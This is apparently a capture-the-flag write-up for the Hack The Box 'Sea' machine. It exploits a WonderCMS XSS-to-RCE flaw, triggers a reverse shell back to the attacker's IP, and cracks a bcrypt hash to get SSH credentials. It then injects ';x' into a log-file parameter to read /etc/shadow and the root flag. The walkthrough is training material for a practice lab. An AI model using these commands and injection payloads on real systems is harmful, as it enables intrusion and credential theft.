Sea
Recon
HTTP (80)
The website had an html form, but nothing worked. No callback was made to the server and XSS didn't have any effect in any fields.
Directory enumeration was also unsuccessful.
Wonder CMS
http://sea.htb/themes/bike/README.md
└─$ curl http://sea.htb/themes/bike/README.md
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview
## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.Looks like the bike theme is a CMS!
And it's open source https://github.com/WonderCMS/wondercms
└─$ curl http://sea.htb/themes/bike/version
3.2.0XSS -> RCE
This version of CMS is vulnerable to CVE-2023-41425.
└─$ py exploit.py 'http://sea.htb/loginURL' 10.10.14.197 4444
...
---
# Adding later, same steps basically as PoC
└─$ curl "http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.197&lport=4444"
---
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.28:35652.
$ whoami
www-dataNote: After some sweat and blood I discovered that the exploit doesn't work and I blame box configuration, sometimes it made single request within ~10h 🥴. The exploit was already sitting in the
themesdirectory ready to be triggered... (EVEN WHEN NEW BOX WAS SPAWNED)
Another note:
Make sure that change URLs as box doesn't have access to the internet.
www-data@sea:/var/www/sea/data$ cat database.js | grep pass -i
cat database.js | grep pass -i
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
"content": "<h1>How can I participate?<\/h1>\n<p>To participate, you only need to send your data as a participant through <a href=\"http:\/\/sea.htb\/contact.php\">contact<\/a>. Simply enter your name, email, age and country. In addition, you can optionally add your website related to your passion for night racing.<\/p>",
Crack password
Not sure why there are \ in the hash, but hashcat and john didn't like that. Remove them and start cracking the hash.
➜ cat .\hashes
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
➜ .\hashcat.exe --show hashes
...
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
...
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=./rockyou.txt --format=bcrypt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:48 DONE (2024-08-11 16:54) 0.02076g/s 64.27p/s 64.27c/s 64.27C/s iamcool..carpediem
Use the "--show" option to display all of the cracked passwords reliably
Session completedThere are only 2 users:
$ ls -Alh /home
total 8.0K
drwxr-xr-x 4 amay amay 4.0K Aug 1 12:22 amay
drwxr-x--- 4 geo geo 4.0K Aug 1 12:13 geoSSH (22)
Creds:
amay:mychemicalromance
User.txt
amay@sea:~$ cat user.txt
e4d3732c9c102d3a4975a05de384f534Privilege Escalation
There seems to be internal applications:
amay@sea:~$ ss -tunlp4
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 123 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:40319 0.0.0.0:*
amay@sea:~$ curl 0:8080
Unauthorized accessamay@sea:~$
amay@sea:~$ curl 0:8080 -X OPTIONS -i
HTTP/1.0 401 Unauthorized
Host: 0:8080
Date: Sun, 11 Aug 2024 13:04:27 GMT
Connection: close
X-Powered-By: PHP/7.4.3-4ubuntu2.23
WWW-Authenticate: Basic realm="Restricted Area"
Content-type: text/html; charset=UTF-8
Unauthorized access
amay@sea:/var$ curl 0:8080 -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ=='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>System Monitor(Developing)</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f2f2f2;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
}
.container {
width: 800px;
background-color: #ffffff;
border-radius: 10px;
box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
padding: 20px;
}
h1 {
color: #333333;
text-align: center;
margin-top: 0;
}
.status {
padding: 20px;
border-bottom: 1px solid #cccccc;
margin-bottom: 20px;
}
.status:last-child {
border-bottom: none;
margin-bottom: 0;
}
.status h2 {
color: #666666;
margin-top: 0;
}
.status p {
color: #333333;
margin: 10px 0;
}
.status.error {
background-color: #ffe6e6;
}
.status.success {
background-color: #e6ffe6;
}
.button {
background-color: #4CAF50;
color: white;
padding: 10px 20px;
border: none;
border-radius: 5px;
cursor: pointer;
margin-top: 10px;
transition: background-color 0.3s;
display: inline-block;
}
.button:hover {
background-color: #45a049;
}
</style>
</head>
<body>
<div class="container">
<h1>System Monitor(Developing)</h1>
<div class="status">
<h2>Disk Usage</h2>
/dev/mapper/ubuntu--vg-ubuntu--lv 6.6G 4.2G 2.1G 68% /
<p>Used: </p>
<p>Total: 68%</p>
</div>
<div class="status">
<h2>System Management</h2>
<form action="" method="post">
<button type="submit" name="clean_apt" class="button">Clean system with apt</button>
<button type="submit" name="update_system" class="button">Update system</button>
<button type="submit" name="clear_auth_log" class="button">Clear auth.log</button>
<button type="submit" name="clear_access_log" class="button">Clear access.log</button>
</form>
</div>
<div class="status">
<h2>Analyze Log File</h2>
<form action="" method="post">
<select name="log_file">
<option value="/var/log/apache2/access.log">access.log</option>
<option value="/var/log/auth.log">auth.log</option>
</select>
<button type="submit" name="analyze_log" class="button">Analyze</button>
</form>
</div>
</div>
</body>
</html>By adding Authorization header and base64 version of auth (of amay), we are able to preview the page.
Port forward the port
└─$ ssh amay@sea.htb -L 8080:0:8080HTTP (8080)
Analyze log files allows us to read files, and path look hardcoded.
I didn't have Burp open and was lazy to turn it back on, so I just edited HTML to read desired file like /etc/shadow
It looks like the app is literally searching for "suspicious", /etc/shadow has some suspicious characters so it doesn't show full file, but if we inject something into filename whole file becomes suspicious and shown fully:
└─$ curl 'http://localhost:8080/ui' -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==' -d 'log_file=/etc/shadow;x&analyze_log='
...
root:$6$llVzHhr7xHrvx1wJ$gH0PLbyPaIOqLrpjpzGZbM2bZ/iHaOfv/bj1YRrktVeZ8.1KQ0Jr1Rv/TL/3Qdh84Fwec1UhX2v0LVAGsuzq.0:19775:0:99999:7:::
...
amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::
...
geo:$6$5mAIqOze4GJ4s9Zu$P3IgUSHlcCkKpDJ0862IgP5aqaNilEUZDGIm16FiWdxh1A5dfKjmwhMgp3xctHiHZVWGtmKY25cCrILanDPaG.:19934:0:99999:7:::
_laurel:!:19936::::::I was not able to read /root/.ssh/id_rsa :/
Root.txt
└─$ curl 'http://localhost:8080/ui' -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==' -d 'log_file=/root/root.txt;x&analyze_log=' -s | grep 'Analyze</button>' -A100
<button type="submit" name="analyze_log" class="button">Analyze</button>
</form>
9cf24e872d21a687c5238a7fd92785f8
<p class='error'>Suspicious traffic patterns detected in /root/root.txt;x:</p><pre>9cf24e872d21a687c5238a7fd92785f8</pre> </div>
</div>
</body>
</html>Last updated